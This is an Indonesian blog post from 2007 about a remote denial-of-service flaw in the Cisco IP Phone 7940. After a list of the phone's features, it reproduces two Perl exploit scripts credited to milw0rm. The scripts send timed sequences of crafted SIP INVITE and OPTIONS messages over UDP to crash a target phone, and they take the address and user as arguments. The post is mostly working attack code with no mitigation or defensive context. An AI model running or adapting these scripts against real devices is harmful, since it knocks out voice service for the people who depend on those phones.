My Opinion

Remote Denial of Service Exploit pada Cisco IP Phone 7940

By brokencode ⋅ August 22, 2007 ⋅  Email This Post ⋅  Print This Post ⋅ Post a comment

Cisco IP Phone adalah mesin telephone berbasis voice IP (VoIP) keluaran Cisco Systems, Inc. Kelebihan dari Cisco IP Phone 7940 ini antara lain :

• Directories: The Cisco IP Phone 7940G identifies incoming messages and categorizes them for users on the screen
• This allows users to quickly and effectively return calls using direct dial-back capability.
• Settings: The Settings feature key allows the user to adjust display contrast and select from a large number of unique ringer sounds, volume settings for all audio such as ringer, handset, headset, and speaker. Network Configuration preferences can also be set up. (Network configuration is usually set up by the System Administrator.) Configuration can either be automatic or manually set up for Dynamic Host Control Protocol (DHCP), Trivial File Transfer Protocol (TFTP), CallManager, and backup CallManagers
• A huge advantage is the ability for no hands on moves and changes
• Just pick up the phone and move to the new location anywhere on your network
• Services: The Cisco 7940G allows users to quickly access diverse information such as weather, stocks, quote of the day, or any Web-based information using extensible markup language (XML) to provide a portal to an ever-growing world of features and information. 24+ user-adjustable ring tones
• A hearing-aid-compatible handset (meets American Disabilities Act [ADA] requirements) and HAC compliance for magnetic coupling to approved HAC hearing aids
• G.711 and G.729a audio compression
• H.323 compatible and Microsoft NetMeeting compatibility
• An IP address assignmentÑDHCP client or statically configured
• Comfort noise generation and voice activity detection (VAD) programming on a system basis

Baru-baru ini ditemukan kelemahan pada sistem internal mesin tersebut yang dapat mengakibatkan penyalahgunaan dengan menggunakan metode eksploit remote denial of service.

10 SIP messages :

#!/usr/bin/perl

use IO::Socket::INET;

die “Usage $0 <dst-address> <dst-port> <dst_username> <src-address>” unless ($ARGV[3]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>’udp’,

PeerAddr=>$ARGV[0]);

$msg = “INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n”;

$socket->send($msg);

sleep(8.2);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=02\r\nCall-ID: 02\@$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(1.5);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=03\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(3.3);

$msg = “INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=04\r\nCall-ID: 04\@$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type: application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253 1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98 speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0 PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n”;

$socket->send($msg);

sleep(4);

$msg = “OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(4);

$msg = “OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@invalidURL>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(12);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=07\r\nCall-ID: 07\@$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(3);

$msg = “INVITE sip:invaliduser\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=02;rport\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=08\r\nTo: <sip:7440-2\@$ARGV[0]>\r\nContact: <sip:tucu\@$ARGV[3]>\r\nCall-ID: 08\@$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4 192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024 RTP/AVP 0 3 8 97 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97 spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n”;

$socket->send($msg);

sleep(3);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=09\r\nCall-ID: 09\@$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept: application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(3);

$msg = “OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nFrom: <sip:tucu\@$ARGV[3]>;tag=10\r\nCall-ID: 10\@$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

# milw0rm.com [2007-08-21]

3 SIP messages :

#!/usr/bin/perl
use IO::Socket::INET;

die “Usage $0

” unless ($ARGV[2]);$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>’udp’,

PeerAddr=>$ARGV[0]);

$msg = “INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n”;;

$socket->send($msg);

sleep(1);

$msg =”OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

sleep(1);

$msg =”OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: ;tag=02\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n”;

$socket->send($msg);

# milw0rm.com [2007-08-21]

Tags: General Info, Hacking